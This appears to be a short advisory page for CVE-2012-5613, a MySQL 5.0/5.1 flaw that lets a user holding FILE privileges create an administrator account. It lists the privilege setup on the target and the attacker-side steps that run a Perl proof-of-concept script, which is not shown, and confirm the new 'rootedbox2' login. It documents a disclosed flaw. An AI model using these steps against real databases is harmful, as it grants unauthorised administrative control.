Timeline :

Vulnerability discovered by @kingcope

Vulnerability disclosed by @kingcope the 2012-12-01

PoC provided by :

kingcope

Reference(s) :

CVE-2012-5613

Full Disclosure Mailing-list

Red Hat Bugzilla

Affected version(s) :

MySQL 5.0

MySQL 5.1

Other ?

Tested on Centos 5.8 x86 with :

MySQL Server version 5.0.95 Source distribution

Description :

An attacker with access to a MySQL database through a user having some specific privileges, will be allowed, through this vulnerability to create a MySQL administrator user. The created user specified in the PoC script is by default “rootedbox2” with “rootedbox2” as password.

Commands :

On the target side : CREATE DATABASE exampledb; GRANT ALL PRIVILEGES ON exampledb.* TO [email protected]'192.168.178.26' IDENTIFIED BY 'test'; GRANT FILE ON *.* TO [email protected]'192.168.178.26' IDENTIFIED BY 'test'; FLUSH PRIVILEGES; On the attacker side : mysql -u user1 -h 192.168.178.34 -p exampledb -> allowed mysql -u rootedbox2 -h 192.168.178.34 -p -> denied perl mysql_privilege_elevation.pl mysql -u rootedbox2 -h 192.168.178.34 -p -> allowed